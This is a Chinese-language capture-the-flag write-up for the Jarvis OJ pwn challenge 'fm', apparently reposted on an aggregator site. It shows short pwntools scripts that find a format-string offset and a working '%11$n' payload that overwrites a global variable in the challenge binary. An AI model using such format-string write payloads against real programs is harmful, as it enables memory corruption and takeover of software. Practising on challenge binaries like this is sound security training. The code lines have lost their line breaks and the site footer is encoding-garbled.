[Jarvis OJ - PWN]——[61dctf]fm

• 題目地址: https://www.jarvisoj.com/challenges
• 題目:
  
  還是先checksec一下, 開(kāi)啟了canary 和NX保護(hù)
  
  在IDA中，查看一下, 這是一道格式化字符串的題。
  
  找到x的地址
  

在pwndbg中進(jìn)行調(diào)試一下, 尋找偏移

from pwn import *#p = remote("pwn2.jarvisoj.com",9895) p = process("./fm") gdb.attach(p, "b *0x080485AD") x_addr = 0x0804A02C payload = 'aaaa' + '%p' p.sendline(payload) p.interactive()

找到偏移為 0xb = 11

驗(yàn)證一下

from pwn import *#p = remote("pwn2.jarvisoj.com",9895) p = process("./fm") gdb.attach(p, "b *0x080485AD") x_addr = 0x0804A02C payload = 'aaaa' + '%11$p' p.sendline(payload) p.interactive()

0x61616161其實(shí)就是aaaa

因?yàn)槲覀円獙修改為4
所以

exploit

from pwn import *p = remote("pwn2.jarvisoj.com",9895) #p = process("./fm") #gdb.attach(p, "b *0x080485AD") x_addr = 0x0804A02C payload = p32(x_addr) + '%11$n'p.sendline(payload) p.interactive()

一道簡(jiǎn)單的格式化字符串題,希望對(duì)你有所幫助

總結(jié)

以上是生活随笔為你收集整理的[Jarvis OJ - PWN]——[61dctf]fm的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。